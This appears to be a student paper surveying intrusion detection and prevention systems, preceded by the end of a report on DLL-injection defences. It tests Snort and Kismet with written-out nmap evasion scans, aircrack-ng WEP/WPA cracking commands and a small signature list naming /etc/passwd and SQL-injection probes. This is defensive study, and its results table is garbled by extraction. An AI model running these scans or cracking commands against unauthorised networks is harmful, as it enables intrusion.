A common technique for injecting malicious code is the loading of an unintended dynamic library. For example, on Windows, a malicious program can inject a carefully crafted DLL (Dynamic-Link Library) into the address space of the victim process so that the attacking code resides in the same address space, i.e. it has access to all the data structures and is able to perform arbitrary operations at the privilege level of the victim process. In an article [14] by Robert Kuster, the author describes in detail three ways to inject foreign instructions into a target process. Of the three methods, namely Windows Hooks, CreateRemoteThread & LoadLibrary, and CreateRemoteThread & WriteProcessMemory, two are achieved through the use of a custom DLL. Therefore, if a program does not check for suspicious loaded libraries at run time, it could easily leak sensitive data to the attacker or run arbitrary injected code at its current process privilege, potentially damaging the rest of the system. One way to prevent code injection through foreign libraries is to keep a whitelist of the names and hashes of the authorized libraries the program intends to use. In the event of a library being loaded, the program can check whether it is authorized by looking it up in the whitelist, and immediately unload it if it is not.

5 Conclusion

The methods and techniques we have investigated are by no means exhaustive, and the myriad vulnerability detection and prevention techniques seem to be limited only by a reviewer's time and patience; we have chosen the ones we judged most relevant to this course. As more and more commercial code is written, new attack vectors are continuously being discovered, and an equal number of mitigation techniques end up being proposed and developed. We also note that none of these techniques — indeed, no single technique ever — is a magic bullet capable of securing a program or system on its own. A combination of vulnerability detection and mitigation should always be used to secure systems and the programs running on them.

References

1. Pfleeger, S., and Hatton, L.: "Investigating the Influence of Formal Methods." IEEE Computer, v30 n2, Feb 1997.
2. Jones, T.: Applied Software Measurement, McGraw-Hill, 1991.
3. Johnson, S.: Lint, a C Program Checker. Computer Science Technical Report 65, Bell Laboratories, December 1977.
4. Beizer, B.: Software Testing Techniques, Van Nostrand Reinhold, 1990.
5. Miller, B.P., Koski, D., Lee, C.P., Maganty, V., Murthy, R., Natarajan, A., and Steidl, J.: "Fuzz Revisited: A Re-examination of the Reliability of UNIX Utilities and Services", Computer Sciences Technical Report #1268, University of Wisconsin-Madison, April 1995.
6. ISO/IEC 9899 International Standard. Programming Languages – C. December 1999. Approved by ANSI May 2000.
7. http://www.gnu.org/software/libc/manual/html_node/Copying-and-Concatenation.html
8. http://www.gnu.org/software/libc/manual/html_node/Formatted-Output-Functions.html
9. Larochelle, D., and Evans, D.: Statically Detecting Likely Buffer Overflow Vulnerabilities. In Proceedings of the 10th USENIX Security Symposium (SSYM'01), Vol. 10. USENIX Association, Berkeley, CA, USA, 2001.
10. http://www.dwheeler.com/essays/write_it_secure_1.html
11. http://www.gnu.org/software/libc/manual/html_node/Table-of-Output-Conversions.html
12. A Detailed Description of the Data Execution Prevention (DEP) Feature in Windows XP Service Pack 2, Windows XP Tablet PC Edition 2005, and Windows Server 2003. http://support.microsoft.com/kb/875352
13. http://netsecurity.about.com/od/quicktips/qt/whatisaslr.htm
14. Kuster, R.: Three Ways to Inject Your Code into Another Process. http://www.codeproject.com/KB/threads/winspy.aspx
Intrusion and Prevention System Analysis

Tran Dung – U096942M, Tran Cong Hoang – U096948

Abstract. Intrusion detection is the process of monitoring and analyzing a computer system or network for potential incidents, which include threats or violations of security policies or practices. Now that most networks are interconnected, attackers can easily exploit many systems' vulnerabilities and make use of them to attack those systems. Detecting, recording and deterring these actions has become more and more important, and intrusion detection and prevention systems (IDPS) are therefore becoming essential to any system's security suite. In this research, we discuss several types of IDPS (their components, capabilities, etc.). At the end, we also survey a range of available intrusion detection systems, each from a different category, by carrying out several sample attacks on our own systems and analyzing the results collected.

1 Introduction

An intrusion detection and prevention system (IDPS) is software capable of monitoring a network or a machine to detect malicious activities and of performing certain actions to stop possible incidents. Every IDPS has the following typical components:

Sensor or Agent. This component monitors and optionally analyzes activities.

Management server. This device's main responsibility is to analyze the information received from all sensors or agents, sometimes in a way that an individual sensor or agent cannot. For example, it can detect correlations, i.e. relationships among event information from multiple sensors or agents (e.g. packets from the same source IP, etc.).

Database server (usually optional). This device simply stores information.

Console. This program is an interface through which the IDPS's administrators perform administrative work, such as configuring sensors/agents and updating the IDPS.

Currently, many intrusion detection systems are available, such as Snort, Kismet or OSSEC. There are two main ways to categorize them: according to their detection methods (signature-based detection, anomaly-based detection, stateful protocol analysis), or according to the way they are deployed and the events they monitor: network-based, wireless, network behavior analysis and host-based. In the following parts, we follow the latter categorization to analyze current IDPS technology. We also focus only on the sensor/agent component of each type of IDPS, since it is the main feature that distinguishes the different types from each other. In addition, high-level descriptions of the capabilities of each type of IDPS are also discussed.

2 Network-based IDPS

2.1 Introduction

Network-based IDPS monitors and analyzes network activity on one or more network segments for suspicious activity.
It is often deployed at boundaries between networks, such as positions near border firewalls or border routers.

2.2 Sensors

Each IDPS sensor monitors traffic on one or more network segments. Sensors are deployed on network interface cards placed into promiscuous mode, which means they accept all incoming packets they see on the network, regardless of destination. Most IDPS deployments use multiple sensors; some even use hundreds. A sensor belongs to one of two types: software-only or appliance. The former means only a software solution is provided, while the latter comprises hardware, software and sometimes even a specialized hardened OS. The appliance type is optimized for the sensing task, so it is much more capable than the software-only solution.

Sensors can be deployed in one of two modes: inline or passive. In inline mode, the sensor is deployed so that all the traffic it monitors must pass through it; in passive mode, the sensor monitors only a copy of the traffic. Inline sensors are often placed directly at special points in the network flow, at divisions between networks (similar to firewalls), such as the border between external and internal networks. Passive sensors are deployed using either a spanning port or a network tap. The spanning port is a special port of a switch which sees all packets passing through the switch, so a sensor connected to this port receives copies of the traffic going through the switch and monitors them. The network tap is a special device which connects the sensor to the network and provides it with a copy of the packets travelling over the network. Passive sensors can also receive copied packets indirectly, sent from an IDS load balancer that aggregates packet copies and distributes them among passive sensors.

2.3 Security capabilities

Detection capabilities. Traditionally, network-based IDPS uses signature-based detection for detecting threats. The IDPS compares the content of each item (network packet or log entry) against known threat patterns, mostly using simple comparison, to identify possible threats; for example, an email with an .exe attachment could possibly carry malware or a virus. This method is effective at identifying known threats, but it has a major weakness: it is very ineffective against unknown threats, or threats that make use of evasion techniques. The types of event commonly discovered by network-based IDPS include the following:

Application layer attacks (e.g. banner grabbing, format string attacks, password guessing, malware transmission, etc.). Several application protocols such as DHCP, HTTP and FTP can be analyzed.

Transport layer attacks (e.g. port scans, unusual packet fragmentation, SYN floods, etc.). The most commonly analyzed transport layer protocols are TCP and UDP.

Network layer attacks (e.g. spoofed IPs, illegal IP headers, etc.). The most commonly analyzed network layer protocols are ICMP, IPv4 and IGMP. Some network-based solutions also support IPv6.

Unexpected application services (e.g. tunneled protocols, backdoors, etc.). These threats can be detected using stateful protocol analysis or anomaly-based methods.

Policy violations (e.g. access to blacklisted Web sites or forbidden application protocols, etc.).
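To make the signature-matching idea above concrete, here is a toy C sketch (the patterns and payload are invented for illustration; a real engine such as Snort uses a far richer rule language and optimized multi-pattern matching, and payloads are not NUL-terminated strings):

    #include <stdio.h>
    #include <string.h>

    /* Known threat patterns, as plain byte strings. */
    static const char *signatures[] = {
        "/etc/passwd",          /* path traversal attempt */
        "%n",                   /* format string specifier */
        "' OR '1'='1",          /* classic SQL injection probe */
    };

    /* Returns the index of the first matching signature, or -1. */
    int match_signatures(const char *payload) {
        for (size_t i = 0; i < sizeof signatures / sizeof *signatures; i++)
            if (strstr(payload, signatures[i]))
                return (int)i;
        return -1;
    }

    int main(void) {
        const char *pkt = "GET /index.php?id=1' OR '1'='1 HTTP/1.1";
        int hit = match_signatures(pkt);
        if (hit >= 0)
            printf("alert: payload matched signature %d\n", hit);
        return 0;
    }

The simplicity of this comparison is exactly why the method fails against unknown threats or slightly obfuscated variants of known ones, as discussed next.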
Even though network-based IDPS can discover a wide range of malicious activities, they have a number of serious limitations. One of the most important is that they have little understanding of many network protocols and cannot track the state of complex communications. For example, many such IDPS cannot pair a request with the corresponding response, or remember previous requests when processing the current one. This prevents signature-based detection from catching attacks that comprise multiple events when no single event clearly signals an attack. Since a network-based IDPS often needs to monitor a huge amount of traffic, and because of these inherent problems with the detection method, this type of IDPS often generates many false positives as well as false negatives. Newer network-based IDPS use a combination of detection methods (signature-based analysis, stateful protocol analysis, etc.) to increase detection accuracy and reduce the number of false alerts.

3 Wireless IDPS

3.1 Introduction

According to figures published on the website of CTIA (The Wireless Association), as of June 2011 there were around 327.6 million wireless subscribers in the U.S. alone. Wireless technology is clearly revolutionizing the way we work and live. Wireless solutions such as Radio Frequency Identification (RFID) tags, for instance, are improving luggage operations at many airports, while everyone is able to send and receive email from their mobile devices. As wireless technology has gained popularity, so have attacks against it. In fact, wireless networks are not only vulnerable to the TCP/IP-based attacks native to wired networks; they also suffer from a wide range of 802.11-specific threats. Unfortunately, traditional IDPS solutions are at times unable to detect or prevent attacks of the latter kind, because traditional IDPS concentrate on threats at layer 3 and above. This implicit trust of layers 1 and 2 stems from the fact that, to get access to the cables or data points of a wired network, attackers must either defeat physical security (e.g. guards, locks) or, in many cases, be an employee. Wireless technology brought about a new situation: wireless networks are susceptible to all the same attacks at layer 3 and above, but they are also vulnerable to many threats at layers 1 and 2. This is unavoidable because the technology uses the electromagnetic spectrum in the radio frequency range as the medium over which computers gain access to the network. In other words, layers 1 and 2 can easily be affected by anyone within radio range of the network, and traditional IDPS usually do not monitor for these kinds of threats. For some time, WLANs had very poor security on a wide-open medium; as new, improved encryption schemes were invented, IDPS technology was also improved to help tackle this problem. In the following parts, we focus on the sensors of wireless IDPS and then discuss the security capabilities of the technology.

3.2 Sensors

The main components of a wireless IDPS are much the same as those of a network-based IDPS: consoles, sensors, management servers and database servers (optional). Other than the sensors, all of the components perform essentially the same roles in both kinds of IDPS. In a wireless IDPS, sensors have the same basic functionality as network-based IDPS sensors.
However, because of the complex nature of monitoring wireless communications, wireless sensors function quite differently. Unlike its network-based cousin, which can monitor all packets on a network, a wireless IDPS works on samples of traffic. There are several frequency bands to monitor, and each band is divided into many channels. Since it is not possible to monitor all packets on a band at the same time, a sensor must handle a single channel at a time. The longer a sensor stays on one channel, the more likely it is to miss malicious activity happening on the other channels. Typically, a sensor is configured to hop among channels frequently, so that it can sample each channel several times per second. Many systems use specialized sensors with several radios and high-power antennas, each radio/antenna pair monitoring a different channel. Some IDPS further coordinate scanning among sensors with overlapping ranges so that each sensor does not have to cover too many channels.

In general, there are three main types of wireless sensors:

Dedicated. Dedicated sensors usually function passively, in a radio-frequency monitoring mode, to sniff wireless traffic. Some dedicated sensors perform analysis on their own, while others simply forward the received packets to the management server. One important characteristic of dedicated sensors is that they do not pass packets from source to destination.

Bundled with an Access Point (AP). Several manufacturers have added IDPS functionality to their access points. A bundled AP may provide weaker detection capability because it has to switch back and forth between monitoring the network for threats and providing network access. If only a single band or channel needs to be monitored, bundled APs can provide acceptable security and network availability.

Bundled with a Switch. This solution is similar to a bundled AP; however, wireless bundled switches are usually not as good as bundled APs or dedicated sensors at detecting threats.

Because of the nature of wireless technology, choosing where to put sensors for a wireless IDPS is a fundamentally different problem from sensor placement for other types of IDPS. In general, wireless sensors should be deployed so that they cover the whole radio-frequency range of the organization's WLANs. At times, to detect rogue APs and ad hoc WLANs, sensors are also placed where there should be no wireless traffic at all, or configured to monitor channels or bands that should not be in use.

3.3 Security capabilities

Detection capabilities. Wireless IDPS do not analyze communications at higher levels (e.g. IP addresses, etc.). Instead, they focus on the lower-level IEEE 802.11 protocol communications and are capable of detecting misconfigurations, attacks and policy violations at the WLAN protocol level. Wireless IDPS can detect a wide range of malicious events; the most commonly detected types include the following:

Unauthorized devices. Using their information-gathering capabilities, most wireless IDPS can detect unauthorized WLANs, rogue APs and unauthorized stations.

Poorly secured devices. Again using their information-gathering capabilities, most wireless IDPS can identify APs and stations which are misconfigured or which use weak WLAN protocols or protocol implementations.

Unusual usage patterns. Some sensors employ anomaly-based detection methods to flag unusual usage patterns.

Wireless network scans.
At times, attackers use scanners to discover unsecured or poorly secured WLANs. Wireless sensors can effectively detect the use of such scanners on the network, provided that the scanners generate some wireless traffic during the scanning process; wireless sensors cannot detect passive devices that only monitor and analyze observed traffic.

Denial of service (DoS) attacks and conditions. Wireless IDPS can usually detect DoS attacks using stateful protocol analysis and anomaly-based detection methods, which check whether the observed amount of traffic is consistent with the expected amount. Sometimes DoS attacks can be discovered simply by counting the number of events during a period of time and alerting when the count exceeds a threshold.

Impersonation and man-in-the-middle attacks. Most wireless sensors can further determine the physical location of an attacker by estimating the attacker's approximate distance from multiple sensors and then calculating coordinates.

Compared to other types of IDPS, wireless IDPS is in general more accurate, thanks to its limited scope (analyzing wireless protocols). False positives are most likely to be produced by anomaly-based detection methods, especially if threshold values are not well configured. On the other hand, wireless IDPS do have some serious limitations, such as being unable to detect certain wireless protocol threats. One of the most important limitations is vulnerability to evasion techniques and to attacks against the IDPS itself. The same DoS attacks (both physical and logical) that aim to disrupt WLANs can also affect the sensors; for example, an attacker can approach sensors located in public areas (e.g. hallways) and secretly jam them.

Prevention capabilities. Wireless sensors usually offer two types of prevention capability:

Wireless. Some sensors can send messages over the air to the endpoints, telling them to terminate connections with a rogue or misconfigured station or AP.

Wired. Some sensors can instruct switches on the wired network to block traffic involving a specific AP or station, based on the device's switch port or MAC address.

One important point to note is that while a sensor is sending signals to terminate connections, it may not be able to continue its monitoring functions until the prevention action is finished. To solve this issue, some sensors are built with two radios: one for monitoring and the other for enforcing prevention actions.

4 Network Behavior Analysis IDPS

4.1 Introduction

Network Behavior Analysis (NBA) IDPS examines and analyzes network traffic to identify threats that generate unusual traffic flows, such as distributed denial of service (DDoS) attacks, certain forms of malware, and policy violations.

4.2 Sensors

Like the other types, an NBA IDPS typically comprises sensors, consoles and, optionally, a management server, and is often deployed as an appliance (hardware and software in one solution). Some NBA IDPS monitor the network directly, just like a network-based IDPS; others do not monitor directly, but instead consume flow data provided by routers or other networking devices (such as NetFlow data from Cisco routers). Just like network-based IDPS, NBA IDPS can be integrated into the organization's standard networks or deployed on a separate management network.
Like network-based sensors, NBA sensors can be deployed in inline or passive mode; most, however, are deployed passively, again with the help of a switch spanning port or network tap. They are usually placed at key network locations, such as the borders between network segments or on important segments. The minority deployed in inline mode are placed between the firewall and the Internet border router, to deal with incoming attacks that could overwhelm the firewall.

4.3 Security capabilities

Detection capabilities. Since NBA IDPS examines network flows, its detection mechanism is based mainly on anomaly-based detection, together with some stateful protocol analysis techniques, rather than on signature-based detection. In anomaly-based detection, the NBA IDPS builds a profile of what constitutes normal behavior and then compares the behaviors observed in the network flow against that profile to detect anomalies. When first deployed, the system undergoes a training period during which it gathers information about normal usage of the network to build its profile. After the training period, profiles may be fixed (static) or adjusted continuously as additional events are observed (dynamic). Static profiles must be regenerated periodically because network conditions keep changing. Dynamic profiles avoid that problem, but are susceptible to being poisoned by an attacker, who can perform small malicious operations continuously until the profiles are updated to include the malicious behavior as normal.

Since NBA IDPS relies mainly on network flow data and anomaly-based detection, it is most effective and accurate against attacks that generate large amounts of network traffic, such as DoS and DDoS attacks. As mentioned, it has several weaknesses when dealing with small-scale attacks spread over a long time. If its sensitivity is increased so that it can detect smaller-scale attacks, the number of false positives also increases: harmless changes to the network (such as a network upgrade or a host changing location) get mistakenly flagged as potential threats. Detection accuracy can also vary over time, and periodic updates to the profiles are required to maintain detection efficiency.

In addition, NBA IDPS suffers from some other limitations, the most important being the delay in its detection. Many systems of this type must wait for flow data from routers to reach them, and wait until the anomaly reaches a certain level, so there is an inherent delay in their detection capability. It may be small (1-2 minutes) but can also be long (10-15 minutes); sometimes an attack is detected only after it has already damaged the system.

Some of the commercially available Network Behavior Analysis intrusion detection and prevention systems are Cisco Guard and Cisco Traffic Anomaly Detector by Cisco Systems (http://www.cisco.com/en/US/products/hw/vpndevc/index.html), Arbor Peakflow X by Arbor Networks (http://www.arbornetworks.com/products_x.php), and OrcaFlow by Cetacean Networks (http://www.orcaflow.ca/features-overview.php).
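As a toy illustration of the profiling idea described above (all numbers are invented; real NBA products build far richer statistical models than a single mean and deviation), the following C sketch learns a traffic profile during a training period and flags a later observation that deviates too far; compile with -lm:

    #include <stdio.h>
    #include <math.h>

    #define TRAIN 8

    int main(void) {
        /* packets/second observed during a hypothetical training period */
        double train[TRAIN] = {110, 95, 130, 120, 105, 98, 125, 117};
        double mean = 0, var = 0;

        for (int i = 0; i < TRAIN; i++) mean += train[i];
        mean /= TRAIN;
        for (int i = 0; i < TRAIN; i++)
            var += (train[i] - mean) * (train[i] - mean);
        double sd = sqrt(var / TRAIN);

        double observed = 900;            /* e.g. a flood in progress */
        if (observed > mean + 3 * sd)     /* 3-sigma rule as the threshold */
            printf("anomaly: %.0f pkt/s vs profile %.0f +/- %.0f\n",
                   observed, mean, sd);
        return 0;
    }

Lowering the threshold factor makes the detector more sensitive but, exactly as noted above, turns benign fluctuations into false positives.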
5 Host-based IDPS

5.1 Introduction

In the IDPS family, host-based IDPS is the eldest sibling, the first to be developed and implemented. Originally, its mission was to protect mainframe computers, whose communication with the outside world was infrequent. Typically, a host-based IDPS is installed directly on a computer system; once deployed, it monitors the state of the host, as well as all events occurring within it, for malicious activity. Examples of what a host-based IDPS might monitor are system logs, changes to files and directories, running processes, system and application configuration changes, and wired or wireless traffic (for that host only).

Since the protected system usually resides on the trusted side of the network, host-based IDPS sit close to the internal authenticated users. This makes them highly effective at detecting insider threats such as disgruntled employees and corporate spies: if one of these users attempts to perform unauthorized actions, a host-based IDPS can detect it and collect the most relevant information in the quickest possible manner. On the down side, if there are hundreds or thousands of endpoints in a big network, collecting and aggregating machine-specific information from each individual computer may not be very efficient or effective. Moreover, if an attacker manages to turn off the data collection function on a machine, the host-based IDPS on that computer may become useless if there is no backup. In the following sections, we discuss the agent, one of the main components of host-based IDPS, and then study the security capabilities of the technology.

5.2 Agents

Just like its siblings, a host-based IDPS has consoles, management servers and (optionally) database servers as its main components. However, instead of using a so-called sensor, host-based IDPS have detection software called agents installed on the machines of interest (e.g. critical hosts such as publicly accessible servers and servers containing important data). Each agent monitors activity on a single host and transmits data to a management server for analysis; at times, agents also perform prevention actions when required.

Instead of installing agents on individual machines, many host-based IDPS use dedicated gadgets running agent software. Each gadget is configured to monitor traffic involving a specific host. Technically, this type of IDPS is more like a network-based IDPS; however, instead of monitoring a whole network, it concentrates on a particular machine, and since these gadgets function in the same or similar ways as host-based agents, IDPS products using gadget-based agents are usually considered host-based. In certain cases, for example when normal agents would negatively affect the performance of the monitored host, gadget-based agents prove quite necessary.

To provide IDPS capabilities, most agents use a shim, which is a layer of code placed between existing layers of code, to capture and analyze data at a point where it would normally be passed between two pieces of code. There are also agents which do not use shims; although these are less intrusive to the host, they tend to be less effective at detecting malicious activity and often lack prevention capabilities. Typically, agents are designed to monitor one of the following:

A server.
Common applications can also be monitored together with the operating system.

A client station. Agents of this type usually monitor the user's operating system as well as common applications such as browsers or email clients.

An application service. Some agents monitor only a particular application service, such as a Web server program. They are usually called application-based IDPS.

5.3 Security capabilities

Detection capabilities. Depending on the techniques a host-based IDPS employs, the types of events it can detect vary widely. Some commonly used techniques include the following:

Code analysis. A number of techniques of this type are quite useful at detecting malware and can also prevent threats such as those that would permit unauthorized code execution or escalation of privileges. Agents may analyze attempts to execute code using one of the following techniques:

Code behavior analysis. Before code is brought into the production system, it can first be run in a sandbox environment and its behavior compared against profiles or rules of known good and bad behavior.

Buffer overflow detection. Attempts to perform stack or heap overflow attacks can be discovered by searching for their typical characteristics, such as certain sequences of instructions.

System call monitoring. Most agents have sufficient knowledge to decide which applications or processes should call which other applications or processes, or perform which actions. For example, agents can forbid certain drivers from being loaded, which can prevent threats such as rootkits.

Application and library lists. An agent can forbid users or processes from loading certain applications and libraries, or certain versions of them.

Network traffic analysis. Some host-based IDPS can analyze both wired and wireless traffic. This technique also allows them to extract files sent by applications such as email clients to check for malware.

Network traffic filtering. Agents often include a host-based firewall to filter incoming and outgoing traffic for each application on the host.

Filesystem monitoring. One important caveat for techniques of this kind is that some host-based IDPS key their monitoring on filenames; if an attacker renames files, these techniques may be useless. In general, common techniques include the following:

File integrity checking. Agents periodically generate message digests or checksums for critical files and compare them against known-good values to identify changes that have already been made, for example by a Trojan horse.

File attribute checking. Agents also routinely check the attributes (e.g. ownership, permissions) of important files to identify changes that have already been made.

File access attempts. Agents using filesystem shims can detect and stop malicious attempts to access important files.

Log analysis. Most agents can analyze OS and application logs to look for malicious activity.

Network configuration monitoring. Some agents can monitor a machine's current network configuration (wired, wireless, virtual private network, etc.) and discover any changes made to it.
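As a sketch of the file integrity checking technique just described (the file path is an arbitrary example and the checksum is a toy FNV-1a hash; a real agent would use a cryptographic digest such as SHA-256 and store its baselines securely):

    #include <stdio.h>
    #include <stdint.h>

    static uint32_t toy_checksum(const char *path) {
        FILE *f = fopen(path, "rb");
        if (!f) return 0;
        uint32_t h = 2166136261u;          /* FNV-1a, illustrative only */
        int c;
        while ((c = fgetc(f)) != EOF)
            h = (h ^ (uint32_t)c) * 16777619u;
        fclose(f);
        return h;
    }

    int main(void) {
        const char *path = "/etc/hosts";   /* a hypothetical critical file */
        uint32_t baseline = toy_checksum(path);  /* taken while trusted */
        /* ... later, on a periodic monitoring pass ... */
        if (toy_checksum(path) != baseline)
            printf("alert: %s modified since baseline\n", path);
        return 0;
    }

Note that, as with log analysis, this only reports changes that have already happened; it cannot by itself prevent them.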
One important point to note is that because a host-based IDPS sits directly on a machine, it can go deeper into that system's details and dig out information that its sibling IDPS types cannot. This results in several unique strengths of host-based IDPS:

Attack verification. Since a host-based IDPS has direct access to a wide range of logs containing critical information about events that have actually occurred, it can easily check whether an attack or exploit was successful, or would have succeeded if not stopped. Based on this knowledge, adequate prevention actions can be selected and alerts can be assigned proper priorities.

Encrypted and switched environments. In a switched network, there may be numerous segments, or separate collision domains. Since siblings such as network-based IDPS can monitor only one segment at a time, it may be difficult for them to achieve the required coverage; and if packets are encrypted with certain types of encryption scheme, they may be blind to certain threats. Host-based IDPS are generally immune to these problems. To overcome the switching issue, host-based IDPS can be installed on as many critical hosts as needed; and since encryption has no impact on what is recorded in the logs, host-based IDPS can detect threats regardless of the encryption schemes in use.

No additional hardware. If gadget-based agents are not required, no additional hardware is needed to run a host-based IDPS, which can result in great savings on maintenance and management.

Detection accuracy is quite challenging for host-based IDPS because a number of the techniques employed, such as log analysis, are unaware of the context in which correctly detected events happened. For example, a machine may be restarted or have a new application installed; these activities could be malicious in nature, or they could be normal operations such as maintenance. In general, the wider the range of techniques a host-based IDPS employs, the more information it receives about occurring events, the clearer its picture of the situation, and the more accurate its detection tends to be.

Just like their siblings, host-based IDPS have their own significant drawbacks. One of the most important is the delay of alerts: even though alerts are generated as soon as malicious attempts are discovered, those attempts have usually already happened. Another limitation involves the use of host resources (memory, processor, storage); at times, agents' operations, especially the shims, can slow down the host's processes. Besides, installing an agent can cause existing host security controls (e.g. firewalls) to be disabled if those controls are determined to function similarly to the agent.

Prevention capabilities. In general, most of the techniques employed by host-based IDS/IPS to detect threats can also help prevent malicious attempts from succeeding. For example, code analysis can prevent code (e.g. malware) from being executed, and filesystem monitoring can prevent critical files from being accessed, modified, replaced or deleted, which effectively addresses malware and Trojan horse issues. On the other hand, some techniques, such as log analysis, cannot prevent malicious activity, because they only discover harmful events after they have already happened.

6 Our experiments

6.1 SNORT (a network-based system)

In the first experiment, the system under test is a machine running Windows 7 Professional, and Snort is the IDS being tested.

Port scans. To perform the attack, we used the popular port scanning program nmap. We carried out two series of scans. Each series used three different scan methods: scanning for open ports (option -Pn), OS detection (option -O), and service and application version detection (option -sV). The first series of scans was performed without any detection-evasion techniques. In the second series, we tried different evasion techniques, including:

Fragmenting the packets (-f).
Setting the MTU (maximum transmission unit) (--mtu).
Using random data length (--data-length).
Using decoy hosts (-D).
Reducing the sending speed (-T).
Idle scanning (-sI).
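For reference, invocations of this kind might look as follows (a sketch; 192.168.0.10, the zombie host and the specific parameter values are placeholders, not the actual hosts and values used in our tests):

    nmap -Pn 192.168.0.10                          # open ports, no evasion
    nmap -O 192.168.0.10                           # OS detection
    nmap -sV 192.168.0.10                          # service/version detection
    nmap -Pn -sS 192.168.0.10                      # TCP SYN scan
    nmap -Pn -D RND:5 192.168.0.10                 # five random decoy hosts
    nmap -Pn -f --mtu 24 192.168.0.10              # fragmentation, small MTU
    nmap -Pn --data-length 25 -T2 192.168.0.10     # random padding, slow timing
    nmap -Pn -sI zombie_host 192.168.0.10          # idle scan via a zombie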
We carried out two series of scan. Each series used three different scan methods: scan for open port (using options: -Pn), scan for OS detection (using -O), scan for services and application version detection - using options: -sV). For the first series, the scans were performed without using any detection evasion techniques. For the second series, we tried to use different avoiding techniques, including: Fragmenting the packet using-f. Setting the MTU (maximum transmission unit) using –mtu. Using random data length (--data-length). Using decoy host with –d. Reducing the sending speed (using -T). Idle scanning. 277 The result is presented in the following table: # Target for detecting 1 Open port Option Succeeded Alerted Alert type -Pn Evasion technique N/A Yes Yes OS -O N/A Yes Yes Services and apps version -sV N/A Yes Yes 2 Open port -Pn Using TCP Syn scan –sS Yes Yes Open port -Pn Using decoy – D Yes Yes Open port -Pn Yes Yes Open port -Pn Yes Yes Open port OS -Pn -O No Yes N/A Yes Services and apps version -sV Yes Yes OS and Services and apps version -O -sV Setting packet fragment and MTU: -f mtu Mixed of previous techniques Idle scan -sI Mixed of previous techniques Mixed of previous techniques Mixed of previous techniques PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak] [Priority: 2] PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak] [Priority: 2] PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak] [Priority: 2] PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak] [Priority: 2] PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak] [Priority: 2] PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak] [Priority: 2] Yes Yes PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak] [Priority: 2] N/A PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak] [Priority: 2] PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak] [Priority: 2] PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak] [Priority: 2] Analysis. From the table, we can see that Snort can detect almost all types of common port scanning, even when the scanning is performed using evasion techniques. The source of the attack is detected in all cases. The theoretically stealthiest type of scanning (idle scanning) is quite hard to carry out, since it requires the sequence number of the idle host to be incremental, which is not very likely to happen nowadays. We tried this attack for several hours without success. 278 From this experiment, we can see that in a simple environment, for personal use, Snort can perform flawlessly against port scanning techniques. However, in real business environment, when the number of packets flowing through the network could be millions or even billions per seconds, the chance of an IDPS system like Snort missing out potential harmful packet is still possible. Therefore, scaling up the IDS system to suite the organization's need is really important to ensure security for the system. 6.2 Kismet (Wireless intrusion detection system) In our tests, we tried to carry out some attacks on some WEP and WPA keys encryption wireless network. The program used to carry out the attack is a program that is very popular in cracking wireless key: aircrack-ng (www.aircrack-ng.org/). The Wireless IDPS used here is Kismet (www.kismetwireless.net/). 
To perform the attack, we used a host machine to broadcast wireless ad hoc networks with several different password schemes: WEP with a 5-character key, WEP with a 13-character key, WPA with an 8-character key (a common word), and WPA with an 8-character key (a mix of characters). The IDS host ran Linux Ubuntu 11.10 with the wireless interface card in monitor mode, running Kismet. The attacking machine ran Linux Ubuntu 11.10 with aircrack-ng and macchanger installed.

For WEP cracking, we performed the attack in two modes: passive mode, where the attacker only captures packets broadcast by the AP and tries to brute-force the key using a statistical method, and active mode, where the attacker actively sends bogus packets to the AP to force it to broadcast more packets and so increase the speed of finding the key. On average, cracking 64-bit WEP encryption (5-character keys) requires only about 50,000-200,000 captured packets; for 128-bit encryption (13-character keys), the security level is not much better, as the attacker only needs to capture about 200,000-700,000 encrypted data frames to crack the key. The results of the attacks can be summarized as follows.

For the WEP key:

Passive attack. The time required to crack the key comes down to luck. On our first attempt, it took only about 10 minutes and 5,000 packets to crack a 5-character key; all subsequent attempts on 5- and 13-character keys required many more packets, with run times of up to several hours. The IDS (Kismet) could not detect any problem, because no suspicious traffic is generated, so it raised no alert.

Active attack. The time required to crack the WEP key dropped to about 10-15 minutes on average, because a large amount of traffic could be generated. However, Kismet raised several alerts, including alerts on an increase in duplicate IVs, a large number of duplicate frames received, and a short deauthentication flood.

For the WPA key: the attack requires capturing only a few frames, exchanged during connection establishment between the AP and the client, so only the passive attack type is needed. After the necessary frames are captured, a dictionary-based attack is carried out. The results were mixed: when the key was a common word, the attack succeeded within a few minutes, but when the key was a complex mix of characters, the attack failed. Besides, since the attacker generates no packets and the number of frames required to start the attack is very small (the bulk of the work is the offline brute-force attack), Kismet cannot detect this threat. However, if a strong key is used, it can take the attacker a very long time to crack it, so the WPA encryption scheme is still relatively secure if handled correctly.
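For reference, the aircrack-ng workflow sketched above typically looks like the following (a sketch; the interface names, channel and BSSID are placeholders, not the values from our tests):

    airmon-ng start wlan0                                      # put the card in monitor mode
    airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w dump mon0    # capture on channel 6
    aireplay-ng -3 -b 00:11:22:33:44:55 mon0                   # active mode: ARP replay to
                                                               # generate extra WEP traffic
    aircrack-ng dump-01.cap                                    # statistical WEP key recovery
    aircrack-ng -w wordlist.txt dump-01.cap                    # dictionary attack on a
                                                               # captured WPA handshake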
However, for many specific types of threat, using other types of IDPS is much more effective and efficient, and sometime, inevitable: Wireless IDPS is much more suitable for securing the wireless network of the organization, Network Behavior Analysis can react better against attacks that generate an unusual amount of traffic on the network (such as under a DoS attack, where the Network-based IDPS, due to overwhelmed by number of packets to examine, could perform much worse), and Host-based IDPS is better at analyzing activity that is transferred through and end-toend communication channel (containing encrypted packet that Network-based IDPS cannot examine), and therefore Host-based IDPS will be much more suitable for protecting important hosts of the network. Therefore, in many systems, especially the big organization, in order to achieve a robust IDPS solution, it is needed to incorporate a combination, or even all of these different IDPS types. Sometimes, even different products of the same IDPS could be used, because each vendor might use different technologies in their development, which could make their product more effective against some particular types of threat in compared to others. If the organization really needs to make use of different IDPS system, they also need to consider how to integrate them in some way to achieve higher efficiency; for example: a network -based IDPS could provide data for a network-based analysis system to analyze. In 